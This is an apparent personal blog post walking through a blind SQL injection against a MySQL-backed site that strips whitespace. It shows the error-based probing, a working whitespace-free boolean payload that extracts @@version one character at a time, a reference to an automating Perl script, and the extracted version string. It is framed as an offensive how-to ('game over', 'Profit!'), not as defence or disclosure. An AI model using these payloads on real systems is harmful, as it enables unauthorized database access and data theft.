Blind
https://vikasprogrammer.tumblr.com/post/49251154907/blind-sql-injection-without-white-spaces
Blind SQL Injection without White Spaces
So, you just found out that doing www.example.com?id=1’ throws a nice mysql error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near “id=1” ORDER BY page_id desc LIMIT 1’ at line 1
Happy, well not yet!
Looking closely at the error and taking out just the output between near …. at line 1
'id=1’’ ORDER BY page_id desc LIMIT 1
This means, no matter what I input, it will be placed between ‘id=<myinput>’. Strange!
So to escape 'id=<myinput>' I tried, ?id=1’ or '1’='1, and interestingly :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near “id=1” ORDER BY page_id desc LIMIT 1’ at line 1
And, more interestingly no mention of my beloved '1’='1, at this point I was basically angry.
I thought to myself, may be its removing the spaces, so I tried ?id=1'or'1’='1 and voila! no errors.
And moments laters, :(
Now, I had to create a query which can identify true and false condition AND with no white space.
[FAST FORWARD]
After a long list of tries, I got this :
/?id=1'or'1’=(SELECT(_utf8’.’)=substring(@@version,X,1))and'1’='1
So, ’.’ is the placeholder for all the testing chars and X is the counter to rotate for all the chars of output. So, as we know if X=2 then output has to be ’.’ i.e TRUE condition. In this case, I got NO “page not found error” and if I tried something else in place of ’.’, I get “page not found error”. Thats it! game over!
I wrote a quick perl script to iterate over all the output chars for all possible ascii printable chars. Profit!
Perl Script: http://pastebin.com/ixB5d90N
Output:
$ perl blind-version-test.pl
5.1.1-Ubuntu
Last updated